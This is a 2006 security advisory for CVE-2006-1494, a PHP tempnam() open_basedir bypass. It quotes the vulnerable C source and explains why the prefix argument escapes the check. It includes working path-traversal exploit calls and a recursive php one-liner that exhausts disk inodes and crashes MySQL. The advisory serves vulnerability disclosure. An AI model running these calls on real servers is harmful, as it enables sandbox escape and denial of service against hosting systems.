[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]
Author: Maksymilian Arciemowicz
Date:
- -Written: 26.3.2006
- -Public: 8.4.2006
CVE-2006-1494
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.
tempnam -- Create file with unique file name
- --- 1. tempnam() open_basedir bypass ---
In function tempname() are required 2 arg`s.
http://pl.php.net/manual/en/function.tempnam.php
string tempnam ( string dir, string prefix )
So, if we have open_basedir set to /home, we can't create file over /home directory.
In ext/standard/file.c (PHP 4.4.2)
- -550-578---
PHP_FUNCTION(tempnam)
{
pval **arg1, **arg2;
char *d;
char *opened_path;
char p[64];
FILE *fp;
if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) {
WRONG_PARAM_COUNT;
}
convert_to_string_ex(arg1);
convert_to_string_ex(arg2);
if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}
d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));
strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p));
if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) {
fclose(fp);
RETVAL_STRING(opened_path, 0);
} else {
RETVAL_FALSE;
}
efree(d);
}
- -550-578---
if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}
Where is arg2?
So we can write exploit like:
tempnam("path_from_open_basedir", "../../../../../../../../Open_basedir_bypasswd");
tempnam("/home", "../../../../../../tmp/cx");
etc.
It is low issue but you can try create a lot of files and overload inodes from HD.I have one particion.
/var /dev/ad0s1e 1.0G 97M 858M 10% /var <- Space (B)
/dev/ad0s1e 1012974 94472 837466 10% 3796 137514 3% /var <- INODES
where mysql and apache try create some file. WWhen we overload free inodes, system have big problem with apache, mysql.
Example:
cxib# php -r 'function cx(){ tempnam("/www/", "../../../../../../var/tmp/cx"); cx(); } cx();'
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
... etc
/usr/local/libexec/mysqld: Can't create/write to file '/var/tmp/ibBIsZ6o' (Errcode: 13)
And mysql die()!
- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS
- --- 3. Greets ---
p_e_a, pi3, eax, Infospec
- --- 4. Contact ---
Author: Maksymilian Arciemowicz